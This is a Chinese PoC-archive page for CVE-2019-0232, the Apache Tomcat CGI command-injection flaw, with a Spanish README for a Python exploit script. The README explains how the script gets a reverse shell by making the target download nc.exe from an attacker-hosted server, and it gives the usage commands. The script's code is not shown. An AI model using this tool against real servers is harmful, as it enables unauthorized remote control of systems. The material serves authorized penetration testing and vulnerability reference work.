POC详情: 8dbacd1bb6fbbc8b6b3bfbfd70692159803599af

来源
关联漏洞
标题: Apache Tomcat 操作系统命令注入漏洞 (CVE-2019-0232)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 9.0.0.M1版本至9.0.17版本、8.5.0版本至8.5.39版本和7.0.0版本至7.0.93版本中的CGI Servlet存在操作系统命令注入漏洞。远程攻击者可利用该漏洞执行代码。
介绍
# Script de Exploit CGI de Apache Tomcat


## Descripción
Un script de Python diseñado para explotar vulnerabilidades CGI en servidores Apache Tomcat mediante la ejecución de una conexión de shell inversa.

## Ejemplo de Uso
![Ejemplo de Ejecución del Script](/assets/exploit.png)

## Características
- Exploit automatizado para vulnerabilidades CGI de Apache Tomcat
- Parámetros de objetivo y atacante personalizables
- Interfaz de línea de comandos sencilla

## Requisitos Previos
- Python 3.x
- Biblioteca `requests`
- Netcat (nc.exe)
- Acceso a un listener para recibir el shell inverso

## Instalación
```bash
git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
```

## Uso
```bash
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
```

### Argumentos Obligatorios
- `-t, --target`: Dirección IP del objetivo con Apache Tomcat
- `-i, --ip`: Dirección IP del atacante que aloja nc.exe
- `-ncp, --nc-port`: Puerto para la conexión de shell inverso

### Argumentos Opcionales
- `-p, --port`: Puerto del objetivo (por defecto: 8080)
- `-sp, --server-port`: Puerto del servidor para alojar nc.exe (por defecto: 80)
- `-cgi, --cgi-script`: Nombre del script CGI a explotar (por defecto: cmd.bat)

## Ejemplo
```bash
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
```

## Descargo de Responsabilidad Legal
Esta herramienta se proporciona únicamente para propósitos educativos y pruebas de penetración autorizadas. El autor y los colaboradores no son responsables de ningún mal uso o daño causado por este script. Siempre obtenga autorización adecuada antes de probar cualquier sistema.

## Autor
- Jose Miguel Romero (k3Pn1c)
文件快照

[4.0K] /data/pocs/8dbacd1bb6fbbc8b6b3bfbfd70692159803599af ├── [4.0K] assets │   ├── [ 92K] exploit.png │   └── [ 58K] nc.exe ├── [1.7K] README.md └── [2.2K] tomcat_cgi_exploit.py 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。